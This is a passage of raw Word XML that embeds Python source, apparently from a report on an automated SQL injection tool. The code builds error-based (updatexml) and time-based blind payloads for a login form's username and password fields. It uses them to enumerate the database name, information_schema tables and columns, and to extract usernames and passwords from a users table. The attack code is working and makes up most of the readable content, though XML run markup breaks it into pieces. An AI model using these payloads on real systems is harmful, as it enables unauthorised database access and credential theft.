      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>updatexml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 xml:space="preserve">1,concat(0x7e,(select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(username,0x3a,password) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F5FE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"from users limit "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) + </w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>",1),0x7e),</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1)#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2F2A2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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157244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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB289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6B558DB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4C29BAB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77EC91E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# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A58D0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 = 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1].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F201E2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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>re.findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('.*~(.*)~.*', res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32C65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mp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = str(res)[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2].split(':')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEFECB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_[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0]] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B59250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res_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EDB996" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF56CA3" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>Post/time_util.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155651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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413B57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sqlis.modules.posts.err_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import log, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>send_request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BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2326549A" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108869C5" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4E6B8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can_inject_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4780066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Start to use time-based blind injection...')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1581F6D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 xml:space="preserve"> = ["'", '")', "')", '"']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E70E5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item in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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1CF1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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A245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"admin" + item + ' and 1=1#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0631434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passwd': "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE9F4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F61789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795C97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703CE26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6AC616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4C4FB1A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Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285FDE0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turn True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D5F53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2B2CC85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Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ECCDB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D5E0B1" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62198A3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exe_func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function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D753D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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B942D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0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294702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243BEAD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' or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length(' + function + ')={0},1,sleep(0.001))#'.format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AD47F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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ADE2D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3F00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177B1C2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68F2AF3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4138EF0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"flag.jp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4035D64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6C6A1E4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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E17BA3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 xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FD41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[ch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)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32, 127)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487E60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0C9037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139E4F1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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4BED4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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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" + function + f",{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},1)='{j}',1,sleep(0.001))#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9CBA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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406694D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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69E25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0B1CE75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6EE3D63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359EAFA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23C4D32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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() not in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 xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.upper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() not in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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5A8A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 xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158409E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print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.lower</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(), end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057D9B3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not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>j.isalpha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB8902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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980109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j, end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5108A56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53BE3DA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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="444F21D4" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD1A1C7" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4738080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tables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4B98482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s_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C161EE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4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AC1F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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5146B8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21):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211B7CD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3690E84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 symbol + " or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(select length(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 xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C7B2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" where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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) limit " + str(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) + ",1)={0},1,sleep(0.001))#".format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E902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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D903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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42A30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30748EC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0296E06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712AD2E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"flag.jp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12E92CA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1662D98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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F3E1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s = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D1D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list(set(chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).lower</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">()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range(32, 127)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A920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25E0FC1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43331D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 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF02AC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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">((select 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 xml:space="preserve"> from "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA55D2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"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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where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database() "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F33A4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"limit " + str(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) + ",1),{0}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'{1}',1,sleep(0.001))#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F3D2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passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA939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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001F837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5402C18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08C6F6F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53FE30C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59A35A6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cols += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD0F0A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print(cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CACDD1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s_ += cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAB35B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 = cols</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49379BE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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75647CCD" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B14B1CB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F5932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columns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0F1C552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s_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFAB1C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5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882CA2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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92101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6A80E91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6E7C3A2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(select length(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECEE5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" where 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='users' limit " + str(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) + "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{0},1,sleep(0.001))#".format(i),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237B32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'passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE05BB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B946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19E94F9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269E5C3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2443C0E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"flag.jp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564D515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6F36392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    break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3AFF4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s = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08613C7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list(set(chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).lower</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">()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range(32, 127)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15594E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1E2A9FE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64452ED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 = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D22EAB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gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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 xml:space="preserve">((select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F93249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"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columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where 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='users' "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF212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"limit " + str(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) + ",1),{0},</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1)=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'{1}',1,sleep(0.001))#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D7916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passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2447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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A0CA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4503768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30E7AE9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432135D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6C1A426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cols += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467355F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print(cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B4F29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s_ += cols + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC58B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 = cols</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -2].split(', ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B750D2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_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44853C8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_ += </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ret[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3] + ', ' + ret[4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466FA77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ret_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447932D6" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A02011" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31FB34B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values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0D2168B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global length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BAABA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users = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75577BC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383493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proofErr w:type="gram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!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401F82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6A9A04A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31B23B2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f" or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(select length(username) from users where id={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>})={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},1,sleep(0.001))#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9382D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passwd': 'admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0F0C6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5BC2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3E38149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087B1B6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75D6445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38095B6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5A03900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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA073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users_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB356D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[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32, 127)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671767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07DB00A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77B3CC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data = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A9A9F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ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spell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(select username "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EAE65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    "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> users "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1894520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    "limit " + </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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- 1) + ",1),{0},1))={1},1,sleep(0.001))#".format(i, j),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1AD08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'passwd': '1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BD73B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C728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33921FA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07D4FA2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108D4B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178E144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users_ += chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD8D3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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>users.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(users_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F362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users_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9D0801" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4248CAA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 xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D94578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3EEE48C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proofErr w:type="gramStart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!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>= 13:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566AF4C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15):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603E35A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 xml:space="preserve"> = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9C8DE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f" or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(select "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC88A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(password) from users where id={</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
